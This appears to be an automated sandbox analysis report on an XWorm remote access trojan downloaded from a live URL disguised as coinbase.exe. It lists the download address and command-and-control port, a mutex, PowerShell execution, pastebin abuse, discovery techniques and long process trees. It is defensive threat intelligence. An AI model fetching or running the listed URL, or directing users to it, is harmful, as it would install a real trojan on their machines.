xworm | hxxp://87[.]120[.]117[.]209/coinbase[.]exe

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 15:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://87.120.117.209/coinbase.exe

Score

10^/10

xworm discovery execution phishing rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://87.120.117.209/coinbase.exe

Extracted

Family

xworm

Version

5.0

87.120.117.209:7000

Mutex

U2y4hALpuDGJOJr0

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5888-419-0x0000000004200000-0x000000000420E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
302	5192	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to execute payload.

execution

PowerShell

T1059.001

pid	Process
5972	powershell.exe
1504	powershell.exe
5192	PowerShell.exe
1504	powershell.exe

Downloads MZ/PE file
A potential corporate email address has been identified in the URL: currency-file@1
phishing

Executes dropped EXE 4 IoCs

pid	Process
5592	file.exe
5652	file.tmp
5756	file.exe
5788	file.tmp

Loads dropped DLL 2 IoCs

pid	Process
5852	regsvr32.exe
5888	regsvr32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
58	pastebin.com
61	pastebin.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5740	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 603930.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
3596	msedge.exe
3596	msedge.exe
3548	msedge.exe
3548	msedge.exe
4668	identity_helper.exe
4668	identity_helper.exe
2636	msedge.exe
2636	msedge.exe
5192	PowerShell.exe
5192	PowerShell.exe
5192	PowerShell.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5436	msedge.exe
5788	file.tmp
5788	file.tmp
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5972	powershell.exe
5972	powershell.exe
5972	powershell.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5888	regsvr32.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5192	PowerShell.exe
Token: SeDebugPrivilege	5972	powershell.exe
Token: SeIncreaseQuotaPrivilege	5972	powershell.exe
Token: SeSecurityPrivilege	5972	powershell.exe
Token: SeTakeOwnershipPrivilege	5972	powershell.exe
Token: SeLoadDriverPrivilege	5972	powershell.exe
Token: SeSystemProfilePrivilege	5972	powershell.exe
Token: SeSystemtimePrivilege	5972	powershell.exe
Token: SeProfSingleProcessPrivilege	5972	powershell.exe
Token: SeIncBasePriorityPrivilege	5972	powershell.exe
Token: SeCreatePagefilePrivilege	5972	powershell.exe
Token: SeBackupPrivilege	5972	powershell.exe
Token: SeRestorePrivilege	5972	powershell.exe
Token: SeShutdownPrivilege	5972	powershell.exe
Token: SeDebugPrivilege	5972	powershell.exe
Token: SeSystemEnvironmentPrivilege	5972	powershell.exe
Token: SeRemoteShutdownPrivilege	5972	powershell.exe
Token: SeUndockPrivilege	5972	powershell.exe
Token: SeManageVolumePrivilege	5972	powershell.exe
Token: 33	5972	powershell.exe
Token: 34	5972	powershell.exe
Token: 35	5972	powershell.exe
Token: 36	5972	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeIncreaseQuotaPrivilege	1504	powershell.exe
Token: SeSecurityPrivilege	1504	powershell.exe
Token: SeTakeOwnershipPrivilege	1504	powershell.exe
Token: SeLoadDriverPrivilege	1504	powershell.exe
Token: SeSystemProfilePrivilege	1504	powershell.exe
Token: SeSystemtimePrivilege	1504	powershell.exe
Token: SeProfSingleProcessPrivilege	1504	powershell.exe
Token: SeIncBasePriorityPrivilege	1504	powershell.exe
Token: SeCreatePagefilePrivilege	1504	powershell.exe
Token: SeBackupPrivilege	1504	powershell.exe
Token: SeRestorePrivilege	1504	powershell.exe
Token: SeShutdownPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeSystemEnvironmentPrivilege	1504	powershell.exe
Token: SeRemoteShutdownPrivilege	1504	powershell.exe
Token: SeUndockPrivilege	1504	powershell.exe
Token: SeManageVolumePrivilege	1504	powershell.exe
Token: 33	1504	powershell.exe
Token: 34	1504	powershell.exe
Token: 35	1504	powershell.exe
Token: 36	1504	powershell.exe
Token: SeIncreaseQuotaPrivilege	1504	powershell.exe
Token: SeSecurityPrivilege	1504	powershell.exe
Token: SeTakeOwnershipPrivilege	1504	powershell.exe
Token: SeLoadDriverPrivilege	1504	powershell.exe
Token: SeSystemProfilePrivilege	1504	powershell.exe
Token: SeSystemtimePrivilege	1504	powershell.exe
Token: SeProfSingleProcessPrivilege	1504	powershell.exe
Token: SeIncBasePriorityPrivilege	1504	powershell.exe
Token: SeCreatePagefilePrivilege	1504	powershell.exe
Token: SeBackupPrivilege	1504	powershell.exe
Token: SeRestorePrivilege	1504	powershell.exe
Token: SeShutdownPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeSystemEnvironmentPrivilege	1504	powershell.exe
Token: SeRemoteShutdownPrivilege	1504	powershell.exe
Token: SeUndockPrivilege	1504	powershell.exe
Token: SeManageVolumePrivilege	1504	powershell.exe
Token: 33	1504	powershell.exe
Token: 34	1504	powershell.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
5788	file.tmp
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe

Suspicious use of SendNotifyMessage 41 IoCs

pid	Process
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
3548	msedge.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe
5468	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3548 wrote to memory of 3904	3548	msedge.exe	83
PID 3548 wrote to memory of 3904	3548	msedge.exe	83
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 460	3548	msedge.exe	84
PID 3548 wrote to memory of 3596	3548	msedge.exe	85
PID 3548 wrote to memory of 3596	3548	msedge.exe	85
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86
PID 3548 wrote to memory of 1396	3548	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://87.120.117.209/coinbase.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff7a3846f8,0x7fff7a384708,0x7fff7a384718
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:2272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  PID:1724
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:3012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:2428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6356 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5736 /prefetch:8
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
  2⤵
  PID:2700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7188 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7672 /prefetch:8
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1772,4364217296106696887,3516055269236163580,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:3172
